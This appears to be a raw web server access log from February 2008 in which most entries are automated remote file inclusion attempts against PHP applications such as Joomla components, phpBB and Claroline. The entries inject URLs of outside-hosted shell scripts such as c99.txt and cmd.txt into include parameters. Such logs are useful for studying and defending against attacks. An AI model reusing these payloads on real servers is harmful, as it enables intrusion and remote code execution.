66.194.79.1 - - [22/Feb/2008:05:33:47 -0800] "GET /logs/modifyform.html?code=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [22/Feb/2008:05:33:51 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:33:54 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:33:54 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:33:54 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:05:34:19 -0800] "GET /index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:05:34:19 -0800] "GET /logs/index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.136.6.38 - - [22/Feb/2008:05:34:27 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [22/Feb/2008:05:34:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [22/Feb/2008:05:34:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:34:41 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [22/Feb/2008:05:35:19 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [22/Feb/2008:05:36:14 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:36:16 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:36:21 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:36:22 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:36:22 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:37:14 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.22.61.119 - - [22/Feb/2008:05:38:31 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://chejefara.uv.ro/c99.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
207.249.0.39 - - [22/Feb/2008:05:39:50 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [22/Feb/2008:05:39:51 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [22/Feb/2008:05:39:51 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:40:48 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:40:49 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:40:49 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:40:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:40:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:40:49 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [22/Feb/2008:05:41:24 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:05:41:32 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:05:41:33 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:05:41:33 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:05:41:55 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:05:41:55 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:05:41:56 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.203.211 - - [22/Feb/2008:05:42:19 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [22/Feb/2008:05:42:21 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [22/Feb/2008:05:42:22 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.rayyea.com.tw/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.194.79.1 - - [22/Feb/2008:05:42:31 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [22/Feb/2008:05:42:31 -0800] "GET /logs/modifyform.html?code=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.54.5.228 - - [22/Feb/2008:05:42:32 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://www.socarretas.com/includes/languages/portugues/images/buttons/CVS/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:42:41 -0800] "GET /index.php?body=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:42:41 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.194.79.1 - - [22/Feb/2008:05:43:00 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:05:43:19 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:05:43:20 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [22/Feb/2008:05:43:20 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [22/Feb/2008:05:43:51 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [22/Feb/2008:05:43:51 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [22/Feb/2008:05:43:51 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [22/Feb/2008:05:43:53 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [22/Feb/2008:05:43:53 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [22/Feb/2008:05:43:53 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [22/Feb/2008:05:45:28 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:48:50 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:48:50 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:48:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:05:49:49 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:49:54 -0800] "GET /logs/access_080201.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:05:49:54 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:05:49:56 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:05:50:21 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:05:50:21 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:05:50:22 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:05:50:22 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:05:50:23 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.189.85.162 - - [22/Feb/2008:05:50:23 -0800] "GET /logs/access_080211.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.116.41.19 - - [22/Feb/2008:05:51:48 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.113 - - [22/Feb/2008:05:55:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.113 - - [22/Feb/2008:05:55:06 -0800] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.110.252 - - [22/Feb/2008:05:55:36 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:55:44 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:55:44 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.58.146 - - [22/Feb/2008:05:57:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
165.138.51.71 - - [22/Feb/2008:05:57:18 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.71 - - [22/Feb/2008:05:57:18 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.71 - - [22/Feb/2008:05:57:18 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.110.252 - - [22/Feb/2008:05:57:23 -0800] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.17.29.41 - - [22/Feb/2008:05:57:43 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
217.17.29.41 - - [22/Feb/2008:05:57:43 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
194.72.9.25 - - [22/Feb/2008:05:57:53 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sitilinux.genova.it/whois/images/codeBack.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.217.247.166 - - [22/Feb/2008:05:58:23 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [22/Feb/2008:05:58:23 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [22/Feb/2008:05:58:24 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.18 - - [22/Feb/2008:05:59:08 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:05:59:11 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:06:00:42 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:06:00:43 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:00:43 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:06:00:43 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.129 - - [22/Feb/2008:06:03:02 -0800] "GET /index.php?pagina1=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.129 - - [22/Feb/2008:06:03:19 -0800] "GET /logs/access_080131.log/index.php?pagina1=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.129 - - [22/Feb/2008:06:03:20 -0800] "GET /index.php?pagina1=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:06:03:28 -0800] "GET /logs/access_080106.log/scanhttp://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:06:03:28 -0800] "GET /scanhttp://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.191.68.129 - - [22/Feb/2008:06:03:34 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:06:04:10 -0800] "GET /logs/access_071214.log/scanhttp://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [22/Feb/2008:06:05:05 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [22/Feb/2008:06:06:23 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
222.96.156.153 - - [22/Feb/2008:06:06:23 -0800] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.101.4.49 - - [22/Feb/2008:06:07:18 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.kadelli.com/admin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:07:35 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:07:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:06:08:17 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:06:08:20 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:06:08:20 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:06:08:20 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [22/Feb/2008:06:08:20 -0800] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Feb/2008:06:08:26 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.kadelli.com/admin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Feb/2008:06:08:27 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.kadelli.com/admin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Feb/2008:06:08:27 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.kadelli.com/admin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:06:08:30 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.103.136.133 - - [22/Feb/2008:06:08:52 -0800] "GET //?mosConfig_absolute_path=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.99.250 - - [22/Feb/2008:06:08:57 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.xjehl.com/nasa/scripts/red.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
